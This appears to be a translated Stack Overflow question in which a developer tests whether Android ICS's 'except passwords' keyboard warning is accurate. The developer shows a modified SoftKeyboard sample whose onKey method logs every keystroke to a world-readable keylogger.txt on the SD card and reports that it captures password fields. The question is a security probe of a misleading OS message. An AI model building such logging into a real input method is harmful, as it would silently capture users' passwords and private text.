我一直在研究Android自定义键盘的安全漏洞,并注意到一些有趣的事情。当我在我的Sharp Aquos姜饼手机上安装键盘时,它告诉我它“也许能够收集你输入的所有文本,包括密码”。然而,在我运行ICS的三星Galaxy Tab2上,它显示“密码除外”。
我决定对此进行测试,并修改了SoftKeyboard Android SDK示例,使其包含一个键盘记录器,写入SD卡以使其更容易从其他应用程序访问:
public void onKey(int primaryCode, int[] keyCodes) {
String keypress = String.valueOf((char)primaryCode);
Log.d("Key Pressed",keypress);
try{
String SDCARD = Environment.getExternalStorageDirectory().getAbsolutePath();
String FILENAME = "keylogger.txt";
File outfile = new File(SDCARD+File.separator+FILENAME);
FileOutputStream fos = new FileOutputStream(outfile,true);
fos.write(keypress.getBytes());
fos.close();
}catch(Exception e) {
Log.d("EXCEPTION",e.getMessage());
}
而且我能够记录文本,即使是在HTML密码字段中。
因此,我的Galaxy选项卡上的信息似乎不正确/有误导性。
这是不是在所有的ICS设备上都是相同的信息,或者三星改变了现有的Android版本的信息?有人知道为什么当密码很容易登录时,它会显示“密码除外”吗?
https://stackoverflow.com/questions/11750169
复制相似问题